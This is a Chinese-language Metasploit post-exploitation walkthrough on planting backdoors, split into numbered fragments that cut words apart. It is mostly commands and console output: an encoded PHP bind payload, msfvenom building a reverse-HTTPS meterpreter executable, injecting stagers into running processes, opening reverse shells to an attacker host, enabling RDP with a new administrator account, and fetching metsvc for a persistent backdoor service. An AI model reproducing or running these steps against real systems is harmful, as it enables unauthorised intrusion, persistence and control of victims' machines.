Metasploit可执行后门.doc

1、只要服务器不关闭！ 大家都晓得HTTP和HTTPS是穿墙的！ detach是中断SESSION链接的命令 Php: msf payload(bind_php) > generate -t raw -e php/base64 eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2 brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https

2、 -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe brk@Dis9Team:~$ file https.exe https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit 上面代码： meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc [*] Reading /root/.ms

3、f4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc [*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs msf exploit(ms08_067_netapi) > use post/windows/manage/payload_inject msf post(payload_inject) > msf post(payload_inject) > show options Module options (post/windows/

4、manage/payload_inject): Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER false no Start an Exploit Multi Handler to receive the connection LHOST 5.5.5.1

5、 yes IP of host that will receive the connection from the payload. LPORT 4433 no Port for Payload to connect to. OPTIONS no Comma separated list of additional options for payload if need

6、ed in 'opt=val,opt=val' format. PAYLOAD windows/meterpreter/reverse_tcp no Windows Payload to inject into memory of a process. PID no Process Identifier to inject of process to inject payload. SESSION

7、 yes The session to run this module on. msf post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf post(payload_inject) > set LPORT 9999 LPORT => 9999 msf post(payload_inject) > set TimestampOutput 0 TimestampOutput =>

8、0 msf post(payload_inject) > set SESSION 5 SESSION => 5 msf post(payload_inject) > exploit [*] Running module against DIS9TEAM-A1 [*] Performing Architecture Check [*] Process found checking Architecture [+] Process is the same architecture as the payload [*] Injecting Windows Meterpre

9、ter (Reflective Injection), Reverse HTTPS Stager into process ID 1636 [*] Opening process 1636 [*] Generating payload [*] Allocating memory in procees 1636 [*] Allocated memory at address 0x00780000, for 363 byte stager [*] Writing the stager into memory... [+] Successfully injected payload in

10、 to process: 1636 [*] Post module execution completed msf post(payload_inject) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 4 meterpr

11、eter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3) 5 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DIS9TEAM-A1 5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3) msf post(payload_inject) > msf post(system_session) > show options Module options (post/

12、multi/manage/system_session): Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER false yes Start an Exploit Multi Handler to receive the connection LHOST 5.5.5.1 yes IP of host that will recei

13、ve the connection from the payload. LPORT 4433 no Port for Payload to connect to. SESSION yes The session to run this module on. TYPE auto yes Scripting environment on target to use for reverse shell (accepted: auto, rub

14、y, python, perl, bash) msf post(system_session) > set HANDLER true HANDLER => true msf post(system_session) > sessions Active sessions =============== Id Type Information Connection -- ---- -----------

15、 ---------- 4 meterpreter x86/win32 DIS9TEAM-A1\brk @ DIS9TEAM-A1 5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3) 5 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DIS9TEAM-A1 5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3) msf post(system_session) > set SESSION 5 SESSION => 5 msf post(s

16、ystem_session) > exploit [-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE. msf post(system_session) > set TYPE bash TYPE => bash msf post(system_session) > exploit [*] Starting exploit multi handler [*] Started reverse handler on 5.5.5.1:4433 [*]

17、Starting the payload handler... [*] Post module execution completed msf post(system_session) > set TYPE python TYPE => python msf post(system_session) > exploit [*] Starting exploit multi handler [-] Job 4 is listening on IP 5.5.5.1 and port 4433 [-] Could not start handler! [-] A job

18、is listening on the same Port [*] Post module execution completed msf post(system_session) > set LPORT 5555 LPORT => 5555 msf post(system_session) > exploit [*] Starting exploit multi handler [*] Started reverse handler on 5.5.5.1:5555 [*] Starting the payload handler... [*] Post modul

19、e execution completed msf post(system_session) > 自动开3389： 很简单，进入模块设置帐号密码。端口，SESSION填(如下ID)： 帐号密码加不了的话就进入到session的shell里加 并添加管理组 msf post(enable_rdp) > show options Module options (post/windows/manage/enable_rdp): Name Current Setting Required Description ---- -

20、 -------- ----------- ENABLE true no Enable the RDP Service and Firewall Exception. FORDWARD false no Forward remote port 3389 to local Port. LPORT 3389 no Local port to fordward remote connection. PASSWO

21、RD no Password for the user created. SESSION yes The session to run this module on. USERNAME no The username of the user to create. msf post(enable_rdp) > set USERNAME test USERNAME => test msf post(enable_rdp

22、) > set PASSWORD test PASSWORD => test msf post(enable_rdp) > set SESSION 5 SESSION => 5 msf post(enable_rdp) > exploit [*] Enabling Remote Desktop [*] RDP is disabled; enabling it ... [*] Setting Terminal Services service startup mode [*] The Terminal Services service is not set to

23、auto, changing it to auto ... [*] Opening port in local firewall if necessary [*] Setting user account for logon [*] Adding User: test with Password: test [*] Adding User: test to local group 'Remote Desktop Users' [*] Adding User: test to local group 'Administrators' [*] You can now login

24、 with the created user [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt [*] Post module execution completed msf post(enable_rdp) > msf post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject msf p

25、ost(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp msf post(multi_meterpreter_inject) > set HANDLER true HANDLER => true msf post(multi_meterpreter_inject) > set LPORT 5624 LPORT => 5624 msf post(multi_meterpreter_inject) > exploit [*] Running module against DIS

26、9TEAM-A1 [*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp [+] Multi/Handler started! [*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624 [+] Starting Notepad.exe to house Meterpreter Session. [+] Process created with pid 1168 [*] Injecting meterp

27、reter into process ID 1168 [*] Allocated memory at address 0x00780000, for 290 byte stager [*] Writing the stager into memory... [+] Successfully injected Meterpreter in to process: 1168 [*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800 [*] Post module

28、 execution completed msf post(multi_meterpreter_inject) > 成功获得了SHELL brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip --2012-03-22 00:54:49-- http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip 正在解析主机 www.phreedom.org... 66.45.226.226 正在连接

29、 www.phreedom.org|66.45.226.226|:80... 已连接。 已发出 HTTP 请求，正在等待回应... 200 OK 长度： 55871 (55K) [application/zip] 正在保存至: “metsvc-1.0.zip” 100%[======================================>] 55,871 46.2K/s 花时 1.2s 2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871]) brk@Di

30、s9Team:/tmp$ unzip metsvc-1.0.zip Archive: metsvc-1.0.zip creating: metsvc-1.0/ inflating: metsvc-1.0/ChangeLog.txt inflating: metsvc-1.0/metsvc-server.exe inflating: metsvc-1.0/metsvc.exe inflating: metsvc-1.0/README.txt creating: metsvc-1.0/src/ inflating: metsvc-1.0/src/M

31、akefile inflating: metsvc-1.0/src/metsvc-server.cpp inflating: metsvc-1.0/src/metsvc.cpp inflating: metsvc-1.0/src/metsvc.h inflating: metsvc-1.0/test.rb brk@Dis9Team:/tmp$ cd metsvc-1.0/ brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met metcli.exe meterpreter.ph

32、p metsrv.x64.dll metsvc-server.exe meterpreter.jar metsrv.dll metsvc.exe brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll . brk@Dis9Team:/tmp/metsvc-1.0$ ls ChangeLog.txt metsvc.exe README.txt test.rb metsrv.dll metsvc-server.exe src brk@Dis9Team:/tmp/metsvc-1.0$